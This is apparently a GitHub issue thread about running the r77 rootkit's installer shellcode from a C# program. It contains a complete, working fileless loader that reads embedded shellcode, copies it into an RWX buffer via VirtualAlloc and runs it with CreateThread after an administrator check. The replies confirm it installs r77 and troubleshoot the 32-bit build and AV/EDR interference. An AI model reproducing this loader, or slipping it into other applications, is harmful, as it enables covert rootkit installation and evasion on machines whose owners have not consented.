(0xc0000005) 'Access violation'

Question

(0xc0000005) 'Access violation'

Closed this issue 8 months ago · 2 comments

Followed steps perfectly to a T, built r77, built Install.shellcode, embedded as resource in C# program, but cannot for the life of me execute the shellcode no matter what I do. I've tried using a byte array, embedding resource, base64, virtualalloc, nothing fixes it

using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Security.Principal;

namespace Onimai.Shared.Helpers
{
    public class RootkitHelper
    {
        public void ExecuteShellcode()
        {
            // Check if the process has elevated privileges
            if (!IsProcessElevated())
            {
                Debug.WriteLine("This operation requires elevated privileges.");
                return;
            }

            // 1. Load Install.shellcode from resources
            byte[] shellCode;
            using (Stream stream = Assembly.GetExecutingAssembly().GetManifestResourceStream("Onimai.Shared.Resources.Install.shellcode"))
            {
                if (stream == null)
                {
                    Debug.WriteLine("Resource not found.");
                    return;
                }
                shellCode = new byte[stream.Length];
                stream.Read(shellCode, 0, shellCode.Length);
            }

            // 2. Create an RWX buffer with the shellcode.
            IntPtr buffer = VirtualAlloc(IntPtr.Zero, (IntPtr)shellCode.Length, 0x1000, 0x40);
            Marshal.Copy(shellCode, 0, buffer, shellCode.Length);

            // 3. Start the shellcode in a thread and wait until it terminated.
            IntPtr thread = CreateThread(IntPtr.Zero, 0, buffer, IntPtr.Zero, 0, out _);
            WaitForSingleObject(thread, 0xffffffff);

            // This is the fileless equivalent to executing Install.exe.
        }

        private bool IsProcessElevated()
        {
            using (var identity = WindowsIdentity.GetCurrent())
            {
                var principal = new WindowsPrincipal(identity);
                return principal.IsInRole(WindowsBuiltInRole.Administrator);
            }
        }

        [DllImport("kernel32.dll")]
        private static extern IntPtr VirtualAlloc(IntPtr address, IntPtr size, int allocationType, int protect);

        [DllImport("kernel32.dll")]
        private static extern IntPtr CreateThread(IntPtr threadAttributes, uint stackSize, IntPtr startAddress, IntPtr parameter, uint creationFlags, out uint threadId);

        [DllImport("kernel32.dll")]
        private static extern uint WaitForSingleObject(IntPtr handle, uint milliseconds);
    }
}

The program '[31960] Onimai.exe' has exited with code 3221225477 (0xc0000005) 'Access violation'.

Install.exe works perfectly fine, but shellcode is broken. I've tried converting and everything

Answer 1 · 2024-05-24T14:09:56.000Z

Your code looks right, so I pasted in into my elevated VS instance and run it, r77 got installed successfully.

We can start by excluding some common errors:

Is your C# process really 32-bit?
Any type of AV / EDR that's interrupting it?
The shellcode that you compiled didn't work. Does the shellcode I offer for download work? (should be the same, though)

Answer 2 · 2024-05-24T23:36:17.000Z

I actually figured out the issue, my vs instance was refusing to build as 32-bit for some reason, I got it to finally ACTUALLY build is 32-bit and it worked just fine. Thank you!